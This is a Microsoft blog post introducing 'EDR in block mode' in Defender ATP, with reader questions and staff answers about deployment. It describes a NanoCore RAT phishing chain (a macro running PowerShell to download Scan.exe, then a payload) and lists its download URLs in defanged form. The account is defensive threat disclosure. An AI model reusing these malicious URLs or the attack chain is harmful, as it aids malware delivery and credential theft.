Introducing EDR in block mode: Stopping attacks in their tracks

Published 08-18-2020 10:07 AM 22.9K Views

Endpoint detection and response (EDR) in block mode is a new capability in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) that turns EDR detections into blocking and containment of malicious behaviors. This capability uses Microsoft Defender ATP’s industry-leading visibility and detection capability to provide an additional layer of post-breach blocking of malicious behavior, malware, and other artifacts that your primary antivirus solution might miss.


Through built-in machine learning models in Microsoft Defender ATP, EDR in block mode extends behavioral blocking and containment, which uses machine learning-driven protection engines that specialize in detecting threats by analyzing behavior. The ability of this feature to detect and stop threats in real time, even after they have started running, empowers organizations to thwart cyberattacks, maintain security posture, and reduce the manual steps and time to respond to threats.


When EDR in block mode detects malicious behaviors or artifacts, it stops related running processes, blocking the attack from progressing. These blocks are reported in Microsoft Defender Security Center, where security teams can see details of the threat and remediation status, and use Microsoft Defender ATP’s rich set of capabilities to further investigate and hunt for similar threats as necessary.



Figure 1. Sample Microsoft Defender ATP alert on threat caught by EDR in block mode


EDR in block mode was developed in close collaboration with customers, and is in public preview starting today. We thank our customers for the partnership and for the invaluable feedback during the limited preview, during which the feature blocked multiple real-world attacks. In this blog, we’ll share details about one of these attacks.


EDR block mode in action


In April of this year, EDR in block mode protected and blocked a NanoCore RAT attack that aimed to steal credentials, spy using a device’s camera, and pilfer other information. The attack started with a spear-phishing email carrying a malicious Excel attachment. The Excel file contained a malicious macro that, when enabled, ran a PowerShell code that in turn downloaded and ran a file from hxxp://office-services-labs[.]com/Scan.exe.



Figure 2. Malicious Excel file used in NanoCore campaign


The organization’s non-Microsoft antivirus solution didn’t detect the Excel file or its behavior, but Microsoft Defender ATP did. EDR in block mode kicked in, stopping the download behavior and blocking the PowerShell code and Excel file. This was reported in the Microsoft Defender Security Center, alerting the security team about the blocked behavior. While the threat was automatically remediated, the alert empowers the security team to perform additional investigation and hunting for similar threats.



 Figure 3. EDR in block mode alert in Microsoft Defender Security Center


Had the attack been allowed to continue, the downloaded file Scan.exe would have run the following PowerShell commands, which would have downloaded the payload, a NanoCore variant, from hxxp://paste[.]ee/r/Pym5k:



Figure 4. Malicious PowerShell commands used by NanoCore campaign


NanoCore is a family of remote access Trojans (RAT) that gather info about the affected device and operating system. It is designed to steal credentials, spy through cameras, and carry out other malicious activities. With EDR in block mode, Microsoft Defender ATP protected against the damaging impact of a successful NanoCore infection.


kill chain.png

Figure 5. NanoCore RAT attack chain


Turning on EDR in block mode


EDR in block mode is in public preview starting today, so if you have preview features turned on in Microsoft Defender Security Center, you can try it now. Once you’ve opted in, turning on EDR in block mode is simple. Go to Settings > Advanced features. Switch the toggle for “Enable EDR in block mode” to On.



Figure 6. Microsoft Defender Security Center Advanced features settings


Security teams are also informed about this feature via the security recommendation titled, “Enable EDR in block mode” in threat and vulnerability management.


Figure 7. EDR in block mode in security recommendations


To learn more about the behavioral blocking and containment capabilities in Microsoft Defender ATP watch this SANS Webcast, refer to our documentation, and read this blog.


If you’re not yet taking advantage of Microsoft’s industry-leading security optics and detection capabilities for endpoints, sign up for a free trial of Microsoft Defender ATP today.


We welcome your feedback. If you have any comments or questions, let us know.



Jeong Mun and Shweta Jha

Microsoft Defender ATP team


Occasional Contributor

This. Is. Awesome!

Occasional Contributor

Hi all,

I would like to ask one question about this feature - what if you're utilizing ASR rules in a strict way - Block Mode and very less exclusions - wouldn’t exploit guard have stopped this particular explained behavior, in your blog post, upfront? would there be a chance of getting conflicts among the two block modes? thank you


@Thomas Höhner - Thanks for posting your question, good one! At the moment you would need Microsoft Defender AV in Active mode to leverage ASR rules. Benefits of EDR block is primarily focused (but not limited) towards the situation where you are running some other AV as primary. 

Occasional Contributor

Hi. Is there any way to enable for a subset of endpoints? We would like to try out on a device group before we enable organization wide (and required by change management). According to Endpoint detection and response in block mode - Windows security | Microsoft Docs EDR Block Mode can only be enabled in Security Center - would be great if we can configure per group like with automation levels.


@Shweta Jha So this is for organisations that dont have windows defender as their primary antivirus ?

Occasional Contributor

@Shweta Jha 


found this one from the ms docs -

it clearly states that defender and cloud protection must/should be up and running...

Didn't had much to deal with 3rd party AVs last years, but we still have customers utilizing other AVs - so is it supported even without defender AV or not?

thank you for clarification



@PHancke Thanks for feedback. Great suggestion, we will consider this while planning our roadmap. will keep you posted. 


@Peter_Kirk - Yes. You can turn on this feature to provide additional layer of post breach protection for the devices not having Microsoft Defender AV as primary AV. Please keep in mind ideally we want our customers to be on full stack MDATP (primary defender AV and EDR) to get best protection, detection and response values.  :)


@Thomas Höhner - when 3rd party AV is installed and device is onboarded to MDATP, Microsoft Defender AV automatically moves into passive mode (not performing active prevention and block). Defender AV needs to remain in passive mode with CDP to use this feature. 

Senior Member

Did EDR in block mode go GA yet?

New Contributor


How can one enable this for a large group of endpoints? In docs it says 

"EDR in block mode can be turned on only in the Microsoft Defender Security Center. You cannot use registry keys, Intune, or group policies to enable or disable EDR in block mode."

Does this mean that each user must turn this on manually? 

One user has the toggle for EDR block mode to "ON", but the recommendation to turn it on is still present, any ideas as to what may be the reason?


@ozesati - not yet, but it will soon, stay tuned :)


@sintra3000 - the setting is switched on in the security center by the security admin. This switches it "on" for all endpoints that are part of your Microsoft Defender for Endpoint service. Endpoint detection and response in block mode - Windows security | Microsoft Docs.


On your point about it being "on" but still seeing the recommendation to turn it on, are you referring to the recommendation in the threat and vulnerability module?


@sintra3000  - you can enable the feature for your organization from portal. Go to Settings --> advanced features

New Contributor

Hi, Thank you. 

Yes in "Security recommendations" under "Threat & Vulnerability management". I turned it on a while a go but I see a lot of endpoints still have it as a recommendation. 


Established Member



Following MS recommendation ( regarding Windows Servers 2016, 2019 that using a third party (non-MS) AV solution, we should consider uninstalling Defender AV to prevent problems etc etc....


In such case, having Windows Servers with Defender AV totally disabled (not in passive mode), deploying Microsoft Defender for Endpoint (first) and after enabled EDR in Block Mode, will have any additional layer of protection or not?


My question adapts on both just installing the "Microsoft Defender for Endpoint" in a Windows Server with disabled defender AV and after with "Enabled EDR in Block Mode".


My last question is, does the aforementioned case affects also MS Windows Servers 2012 or only 2016, 2019 (following MS official documentation only 2016, 2019 mentioned).


Thank you very much,


Occasional Contributor

Need some clarity on Passive vs Active - Is Microsoft recommending that a native Defender AV be present and Active? or Do we recommend that EDR be run as primary?

Frequent Contributor

Microsoft states EDR support is available for Windows Server 2008 and Server 2012. But, is it really EDR? Under the hood, MMA agent is deployed on Server 2012 but all MMA agent can do is push the logs over to log analytics. It cannot do any response actions. Come on Microsoft, be bit honest and at least make your customers aware that EDR on older server versions is basically a read-only report tool with no teeth and customers will still need to rely on other AV products to do anything.

Version history
Last update:
‎Aug 18 2020 10:43 AM
Updated by: